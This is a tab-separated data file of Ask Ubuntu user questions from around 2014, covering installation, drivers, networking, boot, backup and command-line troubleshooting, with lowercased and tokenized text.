423645	can i install ubuntu touch in a yarvik tablet ?	i would like to install ubuntu touch on my tablet `` yarvik '' , but i do n't speak english well and i do n't understand all text from your site . can you help me with installation ? can i install on my tablet ?
423646	use of default alias `` alert ''	the default alias alert is for the command notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' executing alert gives an notification with text alert and an terminal icon . executing it with one param like alert ! ! ! ! ! gives notification with text alert ! ! ! ! ! and ! ! ! ! ! . so , what 's the difference between simple notify-send command and this complexed alias which uses notify-send , echo , history , tail and sed ? in which situations is this alias useful or was it just created for pun ( something like using sudo sudo sudo sudo sudo apt-get install i 'm using ubuntu 12.10
423648	tp link wn727n installation problems	i have read several posts relating to how to get a tp link wn727n usb dongle to work with ubuntu but having only just installed ubuntu-12.04.4-desktop-i386 i 'm afraid i do understand the answers ! like where do you type all the codes that users are giving ? how do you know if ubuntu has even detected the dongle ? i found a website medialink giving details of the ralink rt 5370 driver but i ca n't even see how to download it ? so can anyone please give me clear step by step instructions ? nb : i purchased the tp link wn727n a few days ago to use on windows 7 . but there is some problem with my windows installation , which causes it to have such limited connectivity that i can not connect to the internet at all . that was the main reason i chose to try ubuntu - but now i ca n't get the dongle installed on ubuntu : - (
423651	ubuntu 12.04 lts sound problem	lost my sound by installing realtek hd audio drivers linux version got no hdmi choice tried googling for various codes ended up on dummy output in sound and got no sound controll anymore can anyone help me im new : (
423652	after installing update , two-finger scroll no longer working	i am on a samsung series 5 and it was working gorgeously until yesterday when i let the update manager do its thing . though it is checked , two-finger scroll is just not working at all ! is this a known bug or just my machine ? any help would be appreciated .
423653	backup failed , select for update in a read-only transaction in automatic backups to u1	starting this morning ( 20 feb 2014 ) my automated deja back has started failing with : maximum retries ( 3 ) reached . please try again . ( original error : internalerror : can not execute select for update in a read-only transaction ) i am running ubuntu 12.04 . the configuration of deja backup is out-of-the-box . it backups up to ubuntu one and has been running successfully on a weekly basis for over a year . i 've not changed anything on my computer for some weeks . the last ubuntu automatic update was about 3 days ago . i 've seen someone else has raised exactly the same issue today what other information would you need on this ? this only fails when it backs up to ubuntu one . if i backup to a local folder it is ok . i have plenty of room on my ubuntu one account and i have tried creating a new backup set but no difference . there are no issues with my ubuntu one signon . also , this happens with all user accounts on my computer . everyone has their own ubuntu one backup set . anyone any ideas on this ? advise on what extra information anyone would need to see in able to me . i 'm not very expert on any of this stuff .
423661	install ubuntu on asus p4s8x-x	i have a very ancient pc , for which i 'd like to install ubuntu . motherboard is asus p4s8x-x and graphics card is asus radeon hd4650-agp 1gb . i have heard that graphics card installation could cause problems . sound card is sounblaster 32 bit . is it possible to get ubuntu installed on this ancient machine at all ? if so , could you point me to installation instructions . my main usage is to run databas an programmin with java . i have very limited experince from ubuntu , mainly from 12.04 version . thanks in advance and greetings from finland
423668	ca n't control bluetooth in saucy	i ca n't get bluetooth on my laptop to work properly in ubuntu 13.10 . there is no bluetooth indicator visible , but indicator-bluetooth is installed the bluetooth control panel is greyed out , with the `` power switch '' for bluetooth in the `` off '' position . when i change it to `` on '' nothing happens . there is nothing in syslog . service bluetooth status reports that the service is running hcitool dev lists hci0 hciconfig shows that hci0 is `` up running '' hcitool scan lists bluetooth devices when they 're visible lsmod shows two bluetooth modules : $ lsmod | grep blue bluetooth 372041 12 bnep , btusb , rfcomm toshiba_bluetooth 12852 0 so , it looks like the hardware is detected , powered , and working . but none of the graphical utilities to control bluetooth are . what do i need to do so the normal bluetooth software works properly ?
423672	why do n't git colours appear when using watch ?	when running git status -sb i see : i want to watch ( from procps-ng 3.3.3 ) a repository . the -- color option is supposed to keep colours . interestingly , it works with ls : $ watch -- color `` ls -- color '' showing : however for git the colours disappear : $ watch -- color `` git status -sb '' so , why does watch show colours from ls but not from git output ?
423675	why do octal permissions start with 40 ?	i just installed nemo and i am displaying the octal permission field . the permissions are things like 40755 and 100755 . i am familiar with the last three digits ( 755 ) and i assume those are rwx permissions for owner , group and everyone else . what are the prefix permissions - the 40 and the 100 in my example ?
423677	how do i effectively submit a system level concept for ubuntu tablet for consideration ?	the concept is akin to the implementation of swiftkey in bb10 operating system . it would have to interface with all applications so , while it could gain traction as a standalone application , it would be best if the operating system were designed to accommodate the idea . i 'm not asking for anyone to review the proposal here . i just want to find the right channel so that someone in the right position takes the required 10 minutes to read the proposal and the required 10 minutes to imagine the possibilities . if it 's trash then tell me no thank you . but if it is a good idea , that person would be in a position to advocate for the concept within the organization .
423682	the assembly mscorlib.dll was not found or could not be loaded	i wanted to run my software on a vps , however , when i try to run it with mono , it says the assembly mscorlib.dll was not found or could not be loaded.it should have been installed in the '/usr/local/lib/mono/4.5/mscorlib.dll ' directory . i 've already tried to install mono-complete sudo apt-get install mono-complete however , it says mono-complete is already the newest version . is there anything i can do to fix it ? sincerely , mike ( i run on my vps on ubuntu 13.10 64 bit , and my mono version is 4.0.0 )
423686	12.04 ctrl-alt-8/2 window snap problems only with terminal window	i 'm running a fresh install of ubuntu 12.04 , i have dual screens running on an nvidia gtx 760 running 331.49 drivers . not sure whether this is relevant or not , but i have only the launcher bar enabled on the left most screen , and sticky edges disabled . the two problems i am experiencing involve ctrl-alt-num window snap feature , but only with ctrl-alt-8 and ctrl-alt-2 , and only with a terminal window . these issues do not seem to affect other applications as far as i can tell . problem 1 : on the left screen , when snapping the window to the top or bottom half ( ctrl-alt-8 or -2 , respectively ) , immediately after snapping if i use the cursor to select text the actual selection area appears offset to the right of the cursor by a distance equivalent to the width of the launcher bar . if i use compiz ccsm unity plugin to adjust the size of the launcher bar , the size of the offset changes proportionately . this horizontal cursor/selection offset problem is temporarily resolved by simply clicking the title bar of the terminal window once ( no movement of the window required ) , and subsequent text selection in the terminal window is properly aligned with the cursor . hotkey snapping the terminal window again revives the offset . problem 2 : when using the right screen , and snapping a window to the top or bottom half ( ctrl-alt-8 or -2 ) the window visually appears to be properly snapped on the top/bottom half of the right screen , but the window manager seems to think the terminal window is in fact snapped to the top/bottom of the left screen . to clarify what i mean by this is , after snapping a terminal window on the right screen using either of these hotkey combinations , if i click on the terminal window ( either terminal area , or title bar ) where i see it on the right screen , it is as if i am clicking on the desktop ( or other application behind the terminal window , if there is one ) , and the terminal window goes out of focus . however , after snapping the terminal window on the right screen to the top/bottom , if i click on the left screen in the top/bottom area it is as if i am clicking on the terminal window . to temporarily resolve this issue immediately after snapping the window , if , in the left screen , i click on the invisible area which matches up with the terminal window 's title bar the terminal window gains focus , and i can then click on the visible terminal window where i see it on the right screen . attempted , but failed fixes : i have tried the following dconf reset -f /org/compiz/ gconftool-2 -- recursive-unset /apps/compiz-1 unity -- reset and apt-get purge/reinstall of unity and compiz packages . any suggestions would be appreciated . thanks , brian edit : i would consider this a bug , and if this is better submitted as a bug report , please let me know . i am naive to the protocol of submitting bug reports . that said , perhaps this issue is already known and my searches have not turned up existing knowledge on the issue . however , i am a bit surprised something like this exists in the mature state of this lts release .
423687	update grub-efi-amd64 on 14.04	ca n't update grub-efi-amd64 package on macbook pro retina 13 early 2013 . got the next output : setting up grub-efi-amd64 ( 2.02~beta2-6 ) ... installing for x86_64-efi platform . grub-install : error : can not open `/boot/efi/efi/ubuntu/system/library/coreservices/boot.efi ' : no such file or directory . dpkg : error processing package grub-efi-amd64 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : grub-efi-amd64 actual path to boot.efi is /boot/efi/system/library/coreservices/boot.efi i 'm thinking to make a symlink from /boot/efi/system/library/coreservices/boot.efi to /boot/efi/efi/ubuntu/system/library/coreservices/boot.efi but i think that the better solution is to change the grub2 configuration , but i do n't know how to do this . any help are welcome
423692	installing system hung while loading ubantu 12.04	i am trying to reload ubantu 12.04 installing system comes to a 15 min halt at ubuntu : dkkms : install completed . now stalled at ubuntu cron [ 23368 ] : ( root ) cdm ( cd / & & run-parts -- report/etc/from.hourly ) . second attempt to reload operating systen with out upgrade option help please .paul
423693	crash after modifying rc.local file to solve overheating issue	i made a dual boot on my laptop with windows 8 . after installing ubuntu , i notices that my laptop was really hot , and realized that both gpus are working , my integrated intel gpu and secondary nvidia . i found this solution http : //techhamlet.com/2012/05/ubuntu-how-to-fix-over-heating-of-laptops-with-switchable-graphics/ and it really helped me , my computer stopped overheating instantly . but after some time , whenever i try to reboot , or work on my computer , it freezes , and on version 12.04.4 i was n't even able to reboot it , it just froze on black screen saying something about kernel , nouveau , did n't really manage to remember all . any suggestions ? i think that it would work without changing rc.local , but i really do n't want my computer to overheat .
423698	keyboard and mouse lagging unexpectedly while using any internet browser	i 'm using a macbook pro 5,5 and somewhat recently a bug has cropped up . at some point while using any browser ( i prefer chrome , but this has occurred while using firefox as well ) the keyboard and mouse will begin to lag pretty badly . there is a noticeable lag in typing , and the mouse pointer will dance around the screen . a system reboot fixes the issue , and the frequency at which the problem occurs is very random ( i 've gone as long as a week without the issue happening , and as short a time as simply relaunching the browser after a reboot ) . if anyone has any suggestions , i would gladly appreciate the help .
423702	troubleshooting blank ld_library_path	today i installed acrobat reader from the website , but it fails to run . when i try to run it from the command line , i get : jdibling @ hurricane /opt/adobe/reader9/bin $ ./acroread /opt/adobe/reader9/reader/intellinux/bin/acroread : error while loading shared libraries : libxml2.so.2 : can not open shared object file : no such file or directory however , libxml2 is installed and in the expected location : root @ hurricane /usr # find . -name `` libxml2.so.2 '' ./lib/x86_64-linux-gnu/libxml2.so.2 i noticed that ld_library_path is not set : jdibling @ hurricane /opt/adobe/reader9/bin $ echo $ ld_library_path jdibling @ hurricane /opt/adobe/reader9/bin $ i 'm guessing that this is either the problem , or an indicator of the problem . i 'm not super familiar with how this variable is set under ubuntu , but i have an inkling that is is done via /etc/ld.so.conf.d/ in some way : root @ hurricane /etc/ld.so.conf.d # grep `` lib/x86_64-linux-gnu '' * x86_64-linux-gnu.conf : /lib/x86_64-linux-gnu x86_64-linux-gnu.conf : /usr/lib/x86_64-linux-gnu root @ hurricane /etc/ld.so.conf.d # the chance that at some point i broke my system is greater than zero , but i 'm lost as to where to go from here to troubleshoot and fix this problem . what can i do ?
423703	why am i not able to delete file or folder from ubuntu one ?	i have several files and folders , which i am no longer using.these files are on 2 of my computers and also on the ubuntu one web interface under the tab 'files ' . i have deleted the files from both my computers but they still are visible on the ubuntu one web interface , so it seems that synchronizing did not do what it should do . when i try to delete the files from the ubuntu one web interface i just click on 'more ' at the end of the line with the file and then i choose 'delete ' . after a few seconds the line with the file turns completely red and that is all that happens , because the file is not deleted . the same happens when i try to delete a folder . i also tried to upload a new file but that ends with the message 'no files were uploaded due to an error . then i tried to create a new folder , but then a message : s 'loading . please wait ' appears . this message stays forever on the screen and the only way to stop it is closing the browser . when i open the ubuntu one application on my computer the program starts synchronizing but it disconnects automatically after a few minutes . i can start it again , but again it will disconnect after a few minutes . to be short , ubuntu one does not do anything anymore .
423707	get bash history to remember only the commands run with space prefixed !	the commands executed in the terminal prefixed with blank space ( s ) are not recorded in the command history file . but is there a way to get the reverse i.e . the history should only record those which are prefixed with space ?
423708	wifi problems on my laptop	i have a toshiba satellite c655 and ever since i got it , it has completely refused to connect to wifi . even if i go to the hotspots , it still does n't work and i 've had to use a modem . so i was wondering if there is a program i can download and install or if wifi is not an option on my laptop.thanks
423711	ca n't upgrade using a liveusb , through the newer version is recognized	i run a 13.04 on one of my laptops , now someone brought me the 13.10 iso image ( i work in rural africa ) , yet upgrading to 13.10 did n't work : i created a liveusb i rebooted from it chose `` install 13.10 '' i could see the option `` upgrade from 13.04 to 13.10 '' , but could n't select it . parallel-installation is not an option , to be frank . any ideas ?
423715	how to boot from ubuntu 12.04 cd	i purchased a laptop which was pre installed with ubuntu 13.10 . with whole drive of 350 gb as a one partition ( there is an extended swap partition of 2gb ) i want to install windows 7 with dual boot as well as make one partition for data . how can i do this. ? ? gparted can not unmount the drive so i can repartition it . live cd not booting so that i used gparted through it . why it is not booting ? ( by the way i 'm trying ubuntu 12.04 cd as a live cd )
423716	how do i install tox ?	apparently tox ? is a free and secure replacement of skype . i like it , but how do i install it ?
423722	13.10 and bumblebee	trying to get my intel and nvida gpus to run on xubuntu 13.10 . ( worked with 12.10 ) [ 230.154527 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load module `` glamoregl '' ( module does not exist , 0 ) [ 230.154698 ] [ error ] aborting because fallback start is disabled . i used this guide ( http : //wiki.ubuntuusers.de/hybrid-grafikkarten/bumblebee ) now i 'm stuck with a screen resolution of 800x600 and optirun throws these error .
423723	how to resolve the `` gpt detected . please create a bios-boot partition '' error when using boot-repair ?	after installing ubuntu , windows did n't boot so i installed boot repair to fix this problem . but i am getting the message displayed below . i tried to make a new partition with unformatted file system but still receiving the same message . how do i fix it ?
423724	why do i suddenly have to fully refresh ( ctrl + r ) each page i visit in firefox ?	first of , some revelant tidbits about my browsing-related settings : xubuntu 13.10 firefox 27.0.1 , to which i updated this morning i believe . i did not change any proxy settings in firefox . the problem does not occur in chromium . active add-ons are : noscript 2.6.8.14 reddit enhancement suite 4.3.1.2 ubuntu firefox modifications 2.8 since my latest boot , which was circa 2 hours ago , i have to `` full refresh '' every single page i visit . it says `` page not found '' on each first visit , whether it is askubuntu.com , reddit.com , twitter.com and so forth . sometimes i even have to hit ctrl + r twice or thrice . before this , i think in the last 24 hours , i sometimes ( although in a very rare fashion ) experienced some pages not loading fully . what is causing this ? how can i solve this issue ? additional info after dk bose 's posts with all extensions disabled it worked sporadically better i 'd , but sometimes just as buggy , for example with ubuntu-manual.org . starting firefox with a new profile ( via firefox -profilemanager ) also did n't change things : reddit.com was n't found : http : //imgur.com/3juncbw ubuntuusers.de was loaded only partially : http : //imgur.com/lhdwv06 i 'd say it was equally bad . as reddit.com and ubuntuusers.de were loaded just normally in chromium , it seems to be connected to firefox on ubuntu . hm ... really do not have a clue what is happening .
423725	ubuntu 12.04 32bit cant login	i have tried almost every comment in this subject . my .xsession-errors file says : openconnection : connect : no such file or directory can not connect to brltty at :0 and that is all . i can login as a guest but not with my account .
423726	ubuntu 12.04 lenovo thinkpad w530 with mini dock plus series 3 - no output via dvi	good afternoon , i have a lenovo thinkpad w530 with the quadro k1000m discreet gpu . i also have a lenovo mini dock plus series 3 . this dock has dual dvi output on the back and , according to lenovo , this laptop + dock combination will allow me to have 3 unique displays ( 1x lcd panel and 2x dvi ) . when i dock my thinkpad i never get any output through the dvi ports . the screens flip back to their analogue inputs ( connected to another pc ) . in the bios i 've selected optimus and os switching in the display settings . i 've installed and configured bumblebee to use the nvidia card on demand ( by prefixing commands with optirun - example : optirun glxspheres64 ) is there anything else i need to do or is it simply the case that this dock is not yet supported by ubuntu ? regards robc
423727	ssh tunneling over ssl	on one of my systems there is a firewall forbidding any outgoing unless http ( s ) ... some users have to ssh but they can't.i tried first to run ssh on port 443 but with no success . i googled it and found that i could do it using stunnel , which needs some configuration , so how to do that ?
423728	chromebook boots into chrome os instead of ubuntu	when i turn off my chrombook running ubuntu 13.10 and turn it back on it always boots back into chrome os . how can i get it so that when i turn my acer c7 chromebook running ubuntu 13.10 off then turn it back on it wont boot back into chrome os ?
423733	gnome-terminal in kubuntu shrinks to minimum size	when i open a gnome-terminal in kubuntu 13.10 , the window shrinks to the minimum size , about 20 columns and 1 row . this also occurs when i maximize and then restore the window , or i use the terminal menu to adjust the columns and rows . this does not happen when i open konsole , lxterm , or lxterminal . version information kubuntu v13.10 amd 64 plasma desktop using qt : 4.8.4 / plasma desktop shell 4.11.5 gnome terminal version v3.6.1 .
423734	are there any children safety softwares on ubuntu ?	i have a son , 13 years old , and needs his laptop for school for better writing , etc . but naturally he wants to play with it after working . are there any programs or packages for his safety on the internet ? a program limiting the time on the web and filtering the webpages would be great .
423738	how to install ubuntu tv ( 2014 ) on ubuntu 12.04	i´m trying to install ubuntu tv on my ubuntu 12.04 , and after doing what the wiki suggest , it doesn´t work . can anyone tell me where i can find an updated installation guide ? thanks !
423739	evolution silently crashes	evolution keeps on crashing silently . this happens not in association with what i do with it , it just happens randomly around 1-15min while it 's running . it happened while i was writing mail and it happened while it was just minimized . i tried running it with the console and it seems to be a bug with evolution and the pipelight/wine combination . for some reason , pipelight starts itself together with evolution . i 'm running ubuntu 13.10 ... output below : mario @ work : ~ $ evolution ( evolution:22738 ) : glib-gobject-warning ** : attempt to add property eshellsettings : :start-offline after class was initialised ( evolution:22738 ) : glib-gobject-warning ** : attempt to add property eshellsettings : :cal-working-days-saturday after class was initialised ( evolution:22738 ) : glib-gobject-warning ** : attempt to add property eshellsettings : :mailto-handler-check after class was initialised [ pipelight : lin : unknown ] attached to process . [ pipelight : lin : unknown ] checking environment variable pipelight_silverlight5_0_config . [ pipelight : lin : unknown ] searching for config file pipelight-silverlight5.0 . [ pipelight : lin : unknown ] trying to load config file from '/home/mario/.config/pipelight-silverlight5.0 ' . [ pipelight : lin : unknown ] trying to load config file from '/etc/pipelight-silverlight5.0 ' . [ pipelight : lin : unknown ] trying to load config file from '/usr/share/pipelight/configs/pipelight-silverlight5.0 ' . [ pipelight : lin : unknown ] sandbox not found or not installed ! [ pipelight : lin : silverlight5.0 ] gpu driver check - your driver is supported , hardware acceleration enabled . [ pipelight : lin : silverlight5.0 ] using wine prefix directory /home/mario/.wine-pipelight/ . [ pipelight : lin : silverlight5.0 ] checking plugin installation - this might take some time . [ install-dependency ] wine-silverlight5.0-installer is already installed in '/home/mario/.wine-pipelight/ ' . [ install-dependency ] wine-mpg2splt-installer is already installed in '/home/mario/.wine-pipelight/ ' . wine : can not find l '' c : \\windows\\system32\\winemenubuilder.exe '' err : wineboot : processrunkeys error running cmd l '' c : \\windows\\system32\\winemenubuilder.exe -a -r '' ( 2 ) [ pipelight : win : silverlight5.0 ] embedded mode is on . [ pipelight : win : silverlight5.0 ] windowless mode is off . [ pipelight : win : silverlight5.0 ] linux windowless mode is off . [ pipelight : win : silverlight5.0 ] force setwindow is off . [ pipelight : win : silverlight5.0 ] unity hacks is off . [ pipelight : win : silverlight5.0 ] window class hook is on . [ pipelight : win : silverlight5.0 ] replaced api function createwindowexa . [ pipelight : win : silverlight5.0 ] replaced api function createwindowexw . [ pipelight : win : silverlight5.0 ] replaced api function trackpopupmenuex . [ pipelight : win : silverlight5.0 ] replaced api function trackpopupmenu . fixme : advapi : registertraceguidsw ( 0x2b1f07 , 0x34f118 , { aa087e0e-0b35-4e28-8f3a-440c3f51eef1 } , 1 , 0x66f5f8 , ( null ) , ( null ) , 0x34f118 ) : stub [ pipelight : win : silverlight5.0 ] init successful ! [ pipelight : lin : silverlight5.0 ] using thread asynccall event handling . segmentation fault ( core dumped ) mario @ work : ~ $ fixme : advapi : unregistertraceguids 0 : stub < segmentation fault ( core dumped ) mario @ work : ~ $ fixme : advapi : unregistertraceguids 0 : stub this is the code that the console shows after evolution silently closes ...
423742	command for increasing the volume of mp3 with lame	i 'm using ubuntu 12.04 ( mostly unity 2d ) and i want to use lame in the terminal . i had been using it as an mp3 amplifier , but i forgot the command , all i remember is : lame scale- < scale you want to increase > < infile > < outfile > but it shows : lame : excess arg because.mp3 out because.mp3 is the filename . can anyone tell me the command for it ?
423745	launching wine program from launcher not working	would love some help . i 'm trying to create a working launcher for photoshop . i 've got it installed and working . i can launch the program using ... ~/.wine/drive_c/program\ files\ \ ( x86\ ) /photoshop/photoshop.exe the terminal spits out a ton of fun stuff , the photoshop logo comes up , and it works just like it does on my windows machine , text tool and everything : ) then i close it , and try to open it from the launcher icon i created ( ubuntu gnome 13.10 btw ) , and i get nothing , just a spinning wheel in the toolbar up top . here 's my photoshop.desktop file ... [ desktop entry ] name=photoshop comment=photoshop exec=sh c `` ~/.wine/drive_c/program\ files\ \ ( x86\ ) /photoshop/photoshop.exe '' icon=/usr/share/icons/hicolor/512x512/apps/photoshop.png terminal=false type=application categories=wine ; graphics ; startupnotify=true any help would rock !
423748	ubuntu expectations for laptop drivers	i 'm brand new to the ubuntu world . i 'm trying to understand what ubuntu requires in the way of drivers ( wireless , video , audio etc ) when it 's going to be installed on a laptop . i noticed when i ran ubuntu from a memory stick that i could not get data to pass thru the ethernet port nor the wireless card . when i installed ubuntu in a `` side by side '' arrangement on this same xp laptop the ethernet port worked and the wireless card works . so is the expectation for laptops that you have to have windows drivers already in place and ubuntu has to be installed side by side ? if i had a blank disk-drive would i need to find and download windows drivers and install them via ubuntu ? i 'm not understanding the approach that needs to be taken regarding wireless , video and audio drivers and ubuntu ? thanks .
423750	unable to do anything because im stuck on a single screen with dual monitor setup	my second monitor is not being detected on my main ubuntu account ( writing this from guest atm ) . this leaves me with a dead screen and one screen that does not have my toolbar on it . i ca n't launch the terminal with the keyboard shortcut or get the settings with right mouse click on desktop . i 'm guessing they are opened on my main monitor . is there any way to reset the display options on my main account from another account ? i am ready to throw my pc out the window .
423751	why does arp take so long to execute ?	i'am on a wireless network . on windows , arp -a does n't take long to complete , but on ubuntu it takes a very long time ?
423752	gnu ddrescue imaging results -- 116 errors a lot ?	a little background on this . it 's an 256 gb ssd drive with windows sp3 32-bit and it 's encrypted with pgp whole disk encryption . the file system is corrupt and unreadable . i first ran clonezilla to clone the drive with -q1 ( sector clone ) and clonezilla could not start the clone process because it said the drive is physically damaged ( does it determine this by using smart or looking at the g-list ? ) . i then checked off -rescue ( skips bad sectors ) and it cloned . i wanted a better image/clone so i found ubuntu rescue remix live cd and ran gnu ddrescue . i created an image of the ssd drive using the following syntax : sudo ddrescue -r 5 -v -d { source drive } { dest drive/imgfile } logfile ( retries bad sectors 5 times ; verbose output to screen ; direct access mode to skip kernel cache ) . it finished in 2:30-3:00 hours . the average transfer rate was around ( 25.88 mb/s ) ( i used esata and sata , respectively , to transfer data ) . it also lists `` errors : 116 '' and `` errsize : 470 kb '' . for the record , the program lists `` sector size : 512 bytes '' and `` copy block size : 128 sectors '' . ( i can not post an image because i am new . ) two things : are the results saying that 116 errors ( sectors or blocks ? ) totaling 470 kb were found and transferred or found and not transferred ? if you notice , the program says it 's about to copy 256052 mb and it says it rescued 256052 mb . so , i 'm really not sure . is 116 errors considered to be a lot and indicative of physical damage ? for the moment , i can confirm that , at the very least , over 99 % of data was transferred . i 'd say that 's pretty good . in fact , the rough calculation is : 1 - ( 470 kb/256 gb ) =~ 0.9999981640625 -- > 0.9999981640625 * 100 ~ 99.9998 % . again , clonezilla could n't clone , at first , because it reported that the drive is physically damaged . yet , while gnu ddrescue reported 116 errors , at least most of the data was imaged . i know there are logical errors on the drive . but is this drive physically damaged based on 116 errors totaling 470 kb ? lastly , what is an error ? is that number of bad blocks , sectors , or something else ? and is it at all related to errsize . in my case , it 's 116 errors and errsize of 470 kb . but i have seen other scans on the internet with 1 error and 500 gb errsize . so , i 'm not sure what the correlation is there . update i got no reply so i 'll update and hope someone out there smarter than me will reply with some answers . i ran gnu ddrescue once more , with read retries increased from 5 to 20 . everything else is the same , including the results ( it took slightly longer to image than the first time , because of the read retry increase ) . yes , the error count and error size ( still do n't understand their relationship or what an error means in this program ) are 116 and 470 kb , exactly the same as the first time i imaged with this program . what could that mean ? put a gun to my head , i 'd say this ssd drive is not physically damaged . and if it is , it 's slight . i still do n't know if 116 errors is a lot , but here 's why i think there 's no physical damage . if there was , would n't the error count and error size go up the 2nd time i imaged the drive , especially with increasing the read retries to 20 ? i wanted the errors to go down , which is why i tried imaging again . i do n't have much experience with ssds . but perhaps they differ from mechanical disks in that if you ca n't read a bad block , most likely you wo n't be able to , no matter how many times you retry . i 'm assuming data recovery services have vastly superior software and hardware tools that could read bad blocks from an ssd , however . this ssd drive has been slaved quite a few times to analyze and also attempt decryption . i 've cloned with it clonezilla ( which claims it 's physically damaged ) , and then i imaged it twice with gnu ddrescue with one parameter value increased and the image results are exactly the same . one would think that with all that this drive has been through , if it was failing , it would take a long time to read from/write to and the number of errors would increase . but none of that has happened . maybe i 'm just getting lucky and it is physically damaged . but if it is , i think it 's slight . but i 'll ask again : is 116 errors a lot ? what 's the correlation of errors to error size , when i 've read accounts of image results with 1 error and an error size of many , many gbs ? and is an error here in terms of sectors , blocks , or some other measurement ? thank you .
423754	can i install ubuntu 13.10 64bit on my lanovo g580 laptop	hi , i have a lenovo g580 i5 processor , 8gb ram and 500gb hdd . i have already installed windows 8 64-bit operating system and i want to install ubuntu 13.10 64-bit with dual boot . what will the bios settings be before install ubuntu uefi or legacy ? also , when i boot my laptop , i want it to ask me to choose my operating system ( see picture ) thanks ... ! [ enter image description here ] [ 1 ]
423755	where are the uploaded files from redmine stored ? and its not in `` /redmine/files ''	i am doing a migration from redmine 1.3.2 stable to 2.4.3 for that i need to migrate as well the uploaded files . in every documentation i can find it says that the uploaded files are in the /installdirectory/files but for me , it 's not the case ! in fact i ca n't find any of the uploaded files using locate filename uploaded file directory is selected as writeable in redmine , but i ca n't find it . not even when i upload a testfile called 1234567.txt or something . any ideas where it can be ? my installation folder contains this folder : app , config , db , extra , lib , public , rakefile , script , templates , test , vendor any idea ?
423756	oneliner command to use kill given tcp port number instead of pid ?	i often do e.g . sudo netstat -lpn |grep :8088 view the output tcp6 0 0 : ::8088 : : : * listen 11189/java and then sudo kill -kill 11189 i 'd like to have a more convenient command exactly like killatport 8088 that uses the tcp port number as a variable and that i can make as an alias to a pipeline that does what i want , but how do i get the pid from the output and pipe it to the kill command ? i suppose i might be able to use awk to get the pid from the output from netstat , but how do i safeguard and make an exact port match so that the input 80 wo n't match 8080 and likewise ? should i make it a c program instead ? or is there already a small utility like this ?
423757	confirm shutdown with zenity ?	i got this command which enables me to shutdown ubuntu 13.10 directly from the keyboard ( without needing to open a terminal and running something like sudo shutdown -h now ) : dbus-send -- system -- print-reply -- dest=org.freedesktop.consolekit /org/freedesktop/consolekit/manager org.freedesktop.consolekit.manager.stop i have bound this command to a shortcut : ctrlalt` and it works . however , i want to know if i can get a zenity window which will run the above shutdown command if i type y as a response ; but if i press n the zenity window should close and i can continue with my session .
423758	radeon 9200 graphic card driver shuttle xpc	i recently salvaged a shuttle xpc sd30g2b . processor is stock , ram is less than a gig and the graphics card is a radeon 9200 . there was no os and i figured i 'd dive into ubuntu . installed 13.10 and so far liking the layout but was curious if there were any drivers for the pci-e card . my settings report that i 'm using gallium . poor little bugger hits really high cpu usage and vlc can barely even function . painfully slow frames dropping down like a slideshow . are there any better drivers ? if not would a graphics card upgrade solve the issue or even be worth it ? and would adding more ram be a suitable fix ?
423769	how can i install ubuntu in my smartphone ?	from where can i download the boot files for my phone ?
423772	can i open a certain website with a command line ?	i am configuring hotkeys for commands and want a way to open websites from the command line . for example , how would i open youtube directly in firefox without first opening the browser and then entering the address for youtube ?
423773	how to umount /dev/sda1 or to change for another partition ?	is about this title . i need to change my partition to ntfs and i ca n't because my hdd is occupied with ubuntu .
423782	zscreen - real alternative for automated screen capture	i know there 's scrot for automated screen capture at every x seconds , but i need something like zscreen which provides a gui and simply by click start and stop , i can toggle between the process . and also , i would like to set automatic folder creation for each day ( just like zscreen ) , so that every day , upon capturing the screen at every x second , the screenshot will be moved to the proper folder . i do n't have time to do all this manually ! ! is there any solutions ?
423788	can´t see network on ubuntu 13.10	i installed ubuntu 13.10 on my laptop ( lenovo g580 ) and can´t find one of two wifis in my house . the other one works perfectly - when i´m in range , but it doesn´t reach all the way to the room i need . windows 7 can find and use both networks without any problems . i use broadcom wireless network adapter bcm4247
423791	how can i open programms e.g . skype minimized with a command line ?	i am configuring shortcuts and just thought that it would be awesome to be able to open skype , thunderbird and this stuff minimized with a command-line-shortcut ? is there a way i could do this ?
423801	sudo reboot shuts down instead of rebooting on a x10slm-f	i have a server with the motherboard x10slm-f ( supermicro ) . i successfully installed ubuntu server 12.04 lts on it . the problem i have is that , when i give the command : sudo reboot , the server does n't reboot it shuts off the server . the shutdown command works without any issues , but not the reboot command . any ideas ?
423802	battery drain after dual booting windows 8 and ubuntu 13.10 and sleep problem in windows	new to the forum here , had hoped for a better beginning to the open source world then this . i had never installed ubuntu before until a week back , followed all the precautions so that i did n't fall into trouble while dual booting windows 8 . i installed ubuntu 13.10 alongside windows 8.1 on a asusn56vj ( intel i7 36300m,8gb ram , nvidia 635m ) on c drive itself , provided ubuntu about 35 gb of free space to work with . everything worked fine and ubuntu installed without a hitch . i 've been using ubuntu for the past 1 week and i 've got accustomed to it but i 've been facing a few problems : 1 ) battery drains very quickly . on windows 8.1 , i used to get atleast 2-2.5 hours with decent load on . even when i put the laptop to sleep ( i.e by closing the lid or the fn+zz hotkey ) the battery drains too quickly for my liking 2 ) when using windows , if i put my laptop to sleep for more than 5 minutes , if i try to wake the laptop on , it directly jumps to the default grub screen . i 'm not able to go to the previous session in windows , i need to restart windows all over again sacrificing all my previous work . 3 ) once i shift from a session on windows to ubuntu , all the apps that require information from my other drives ( i.e d , e , f drives ) seem to reset itself . i utilize eiskaltdc++ , clementine , both these apps require access files from the other drives but i need to refresh/ ( remove+add again ) for these apps to have access to these particular folders . i understand this might be a problem due to the way i installed ubuntu . would it be better if i allocate a completely different drive for ubuntu ? i would be glad to do this , heck i would prefer to completely segregate windows 8 and ubuntu and that was the initial plan but most of the tutorials for dual booting never addressed this . i like ubuntu for the amount i 've used it , if it were not for fifa i would shift over to ubuntu completely . your inputs/help would be well appreciated . edit : 1 ) as suggested by sean , here are the outputs of etc/temp and mount -l https : //drive.google.com/file/d/0b07sfccrfan5tfe1rgkwrg5lrtq/edit ? usp=sharing https : //drive.google.com/file/d/0b07sfccrfan5yvlluljulvyyuxc/edit ? usp=sharing
423805	how do i display the battery status icon in the taskbar ?	i have recently downloaded ubuntu 13.10 and am a first time user of this os . how do i display the battery status icon in the taskbar in ubuntu 13.10 . i am unable to see the battery percentage status in the taskbar . request you to help to resolve this issue .
